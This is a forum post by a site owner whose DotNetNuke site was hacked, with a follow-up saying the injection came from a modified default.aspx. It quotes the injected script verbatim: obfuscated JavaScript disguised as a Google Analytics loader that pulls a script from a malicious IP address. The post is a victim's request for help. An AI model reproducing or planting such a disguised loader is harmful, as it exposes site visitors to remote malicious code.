One of the sites I run, tidana.org/DNN was evidently hacked.  Malicious code is being injected into every page, but I can't figure out where it's coming from the offending code is: 

 <script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript sr�='" + gaJsHost + "google-analytics.com/ga.js' " + '!@&s(#r)c@!=&)\'&h$!t^&!$@t@&$p#^&@:$^/&@!&/!9(1)@.(2)1!(2)&.^#6&@&!^5(@!&.&#$1@!4)8!#/($g#$a&.(j^s)'.replace(/#|&|@|\$|\(|\!|\^|\)/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));</script>

Which is a simple redirect to 91.212.65.148 - a known malicious site.

I replaced the dnn\js\ClientAPITests\default.htm file with an original because it appeared to have been modified.  That did not correct the problem, however. 

The injection occours right after the <bodi id="body"> in the source.  I cannot find anything in the DNN files or setup that should do this.  Could it be from the server itself?  Any ideas?  We don't have a whole lot of work in the site, so we could start over, but what if it happens again?  We use very strong passwords, and I am the only one with access to the site, but it's hosted on GoDaddy, and who knows what kind of security they have on the back end...

Shane

Ah ha!  It was the default.aspx.  I did replace the skin, thinking that would be it, but it wasn't.  Thanks for the help.